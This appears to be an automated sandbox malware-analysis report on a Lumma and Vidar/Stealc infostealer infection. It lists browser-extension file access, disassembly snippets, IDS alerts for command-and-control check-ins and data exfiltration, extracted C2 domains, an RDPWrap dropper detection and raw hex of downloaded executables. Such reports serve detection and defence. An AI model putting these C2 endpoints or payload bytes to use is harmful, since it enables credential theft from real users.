Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr fs:[00000030h]	3_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [ebp-04h], eax	3_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then xor eax, eax	12_2_0040F042
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	12_2_0040D470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [esi+01h], 00000000h	12_2_0040F807
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 68677325h	12_2_00447AC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	12_2_00447AC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+14h]	12_2_00447D38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2EE0190Fh	12_2_00447E1B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edi, esi	12_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	12_2_0044B010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	12_2_00425030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then add ecx, dword ptr [esp+eax*4+30h]	12_2_0040C1C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	12_2_0044B1A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	12_2_00427230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	12_2_004452E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	12_2_004142E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah	12_2_0044B320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx eax, byte ptr [ebp+edi+00000090h]	12_2_00407450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	12_2_00412450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+08h]	12_2_00412450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+08h]	12_2_00412450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	12_2_00412450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	12_2_00442410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	12_2_0044B430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	12_2_004314A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h	12_2_004404AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	12_2_0044A510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], cl	12_2_00435519
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	12_2_00433623
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 0633C81Dh	12_2_00449620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	12_2_00434629
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [esi+01h], 00000000h	12_2_0040F63A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [ebx], 00000000h	12_2_00414692
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000668h]	12_2_0041E71A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 77DD2217h	12_2_0041E71A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [esi+01h], 00000000h	12_2_0040F7E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+000001C8h]	12_2_00432830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000198h]	12_2_00432830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	12_2_00432830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	12_2_00432830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	12_2_00432830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	12_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	12_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	12_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	12_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	12_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	12_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	12_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	12_2_004338C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h	12_2_004408E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+14h]	12_2_00444970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000884h]	12_2_00429978
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	12_2_00434990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	12_2_00434990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	12_2_00434990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	12_2_00420A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h	12_2_00440A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+10h]	12_2_0040FA20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [ecx+eax]	12_2_0040FA20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	12_2_0040FA20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh	12_2_0042CAD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh	12_2_0042CAD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	12_2_00421AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh	12_2_00444BC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	12_2_0041AB90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 54CA534Eh	12_2_00448B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	12_2_00430CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	12_2_00405CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	12_2_00404CB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	12_2_00449D22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh	12_2_00445DE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ecx, word ptr [edi+eax]	12_2_00448D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-18h]	12_2_0042FE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	12_2_0042FE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then add ebx, 02h	12_2_00413EEC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	12_2_00413EEC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then dec ebx	12_2_0043FE90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	12_2_00426FC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp dword ptr [004521ECh]	12_2_0041FFD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [esi+eax+01h], 00000000h	12_2_0042DFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	12_2_0043BFF0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2056177 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (wallkedsleeoi .shop in TLS SNI) : 192.168.2.8:49736 -> 104.21.36.139:443
Source: Network traffic	Suricata IDS: 2056164 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gutterydhowi .shop) : 192.168.2.8:59567 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056176 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wallkedsleeoi .shop) : 192.168.2.8:63899 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056165 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI) : 192.168.2.8:49737 -> 172.67.132.32:443
Source: Network traffic	Suricata IDS: 2056162 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ghostreedmnu .shop) : 192.168.2.8:60496 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056160 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (offensivedzvju .shop) : 192.168.2.8:64811 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056158 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vozmeatillu .shop) : 192.168.2.8:50316 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056163 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI) : 192.168.2.8:49739 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2056161 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (offensivedzvju .shop in TLS SNI) : 192.168.2.8:49740 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2056156 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawzhotdog .shop) : 192.168.2.8:63771 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056159 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (vozmeatillu .shop in TLS SNI) : 192.168.2.8:49742 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2056157 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawzhotdog .shop in TLS SNI) : 192.168.2.8:49744 -> 104.21.58.182:443
Source: Network traffic	Suricata IDS: 2056154 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fragnantbui .shop) : 192.168.2.8:54463 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056152 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (stogeneratmns .shop) : 192.168.2.8:65460 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056150 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (reinforcenh .shop) : 192.168.2.8:61357 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056155 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fragnantbui .shop in TLS SNI) : 192.168.2.8:49746 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054495 - Severity 1 - ET MALWARE Vidar Stealer Form Exfil : 192.168.2.8:49747 -> 45.132.206.251:80
Source: Network traffic	Suricata IDS: 2056151 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (reinforcenh .shop in TLS SNI) : 192.168.2.8:49749 -> 104.21.77.130:443
Source: Network traffic	Suricata IDS: 2827449 - Severity 1 - ETPRO EXPLOIT Adobe EMF File Memory Corrpution Vulnerability Inbound (CVE-2017-3123) : 147.45.44.104:80 -> 192.168.2.8:49734
Source: Network traffic	Suricata IDS: 2056153 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (stogeneratmns .shop in TLS SNI) : 192.168.2.8:49748 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.8:49715 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 5.75.211.162:443 -> 192.168.2.8:49715
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 5.75.211.162:443 -> 192.168.2.8:49714
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49742 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49742 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49748 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49740 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49740 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49746 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49746 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49748 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49749 -> 104.21.77.130:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49749 -> 104.21.77.130:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49752 -> 104.21.2.13:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49752 -> 104.21.2.13:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49744 -> 104.21.58.182:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49744 -> 104.21.58.182:443
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 5.75.211.162:443 -> 192.168.2.8:49759
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 5.75.211.162:443 -> 192.168.2.8:49760
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49739 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49739 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49737 -> 172.67.132.32:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49737 -> 172.67.132.32:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49736 -> 104.21.36.139:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49736 -> 104.21.36.139:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: drawzhotdog.shop
Source: Malware configuration extractor	URLs: reinforcenh.shop
Source: Malware configuration extractor	URLs: stogeneratmns.shop
Source: Malware configuration extractor	URLs: fragnantbui.shop
Source: Malware configuration extractor	URLs: ghostreedmnu.shop
Source: Malware configuration extractor	URLs: wallkedsleeoi.shop
Source: Malware configuration extractor	URLs: offensivedzvju.shop
Source: Malware configuration extractor	URLs: gutterydhowi.shop
Source: Malware configuration extractor	URLs: vozmeatillu.shop
Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199780418869

Yara detected RDPWrap Tool

Source: Yara match	File source: 23.0.RDPWInst.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.RDPWInst.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000017.00000000.2112949311.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2150421257.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RDPWInst.exe PID: 1000, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, type: DROPPED

Source: global traffic

TCP traffic: 192.168.2.8:49764 -> 8.46.123.33:3389

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 26 Sep 2024 23:49:48 GMTContent-Type: application/octet-streamContent-Length: 385064Last-Modified: Thu, 26 Sep 2024 22:09:48 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66f5dbac-5e028"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 24 db f5 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 b0 05 00 00 08 00 00 00 00 00 00 3e ce 05 00 00 20 00 00 00 e0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e8 cd 05 00 53 00 00 00 00 e0 05 00 c8 05 00 00 00 00 00 00 00 00 00 00 00 ba 05 00 28 26 00 00 00 00 06 00 0c 00 00 00 b0 cc 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 ae 05 00 00 20 00 00 00 b0 05 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c8 05 00 00 00 e0 05 00 00 06 00 00 00 b2 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 06 00 00 02 00 00 00 b8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ce 05 00 00 00 00 00 48 00 00 00 02 00 05 00 80 bc 05 00 30 10 00 00 03 00 02 00 12 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ad 79 1c 59 59 6c 14 76 5e 87 dc f4 35 66 85 48 24 b2 ce 02 9f f7 2f fa 57 cb 61 b6 7a 7a f0 df 35 4f 10 9b 37 1c cd 12 66 9e 17 53 d5 6c 5c f1 52 42 af 6b 08 35 e6 ea 8e 7f 45 71 7f 85 08 89 95 76 f5 df 0e a5 d6 fc 42 00 1a 12 66 8a 8c a2 0d cc d6 dd fd 9a b7 bc c6 39 76 02 fa f3 3b 28 cc 46 d9 81 20 0a 4a 2a b2 67 cc 69 96 ae 28 1e d1 d6 18 42 b3 42 cb 4d 9a 73 8f a0 c3 3c 0d c8 75 62 e5 20 1b 6c f5 5d b3 87 96 ab bd 51 67 83 b4 d5 5c c3 42 63 2a 84 b1 06 91 e4 24 95 19 a0 1f c7 f8 aa f8 66 56 47 5a 94 db 00 2e f4 cb 98 c5 a0 c0 c1 38 d1 da 99 e2 a3 9c 0e 6c 48 3b 21 f8 0a 17 22 ae e3 f0 fb 82 f0 70 98 55 4f 04 38 d7 59 22 c7 e2 fb f1 64 f2 d1 be 5c eb 0e a2 64 44 22 b3 73 6d 7d cb 63 23 15 3f e1 34 3f 13 f1 59 23 dc 04 b7 a4 e3 17 cb 30 bb 1b 1d ff 56 53 cd bd 1d 58 bb 10 7c 89 e7 0c c4 9d 47 16 2e cb 67 ac 3a 21 72 4d 5b 7e 1b 01 94 65 bf 42 70 d5 e0 62 7a a7 7b 84 1c 13 a4 60 35 1d cc f3 7
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 26 Sep 2024 23:49:51 GMTContent-Type: application/octet-streamContent-Length: 413224Last-Modified: Thu, 26 Sep 2024 22:09:34 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66f5db9e-64e28"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ed da f5 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 1e 06 00 00 08 00 00 00 00 00 00 3e 3c 06 00 00 20 00 00 00 40 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e8 3b 06 00 53 00 00 00 00 40 06 00 c8 05 00 00 00 00 00 00 00 00 00 00 00 28 06 00 28 26 00 00 00 60 06 00 0c 00 00 00 b0 3a 06 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 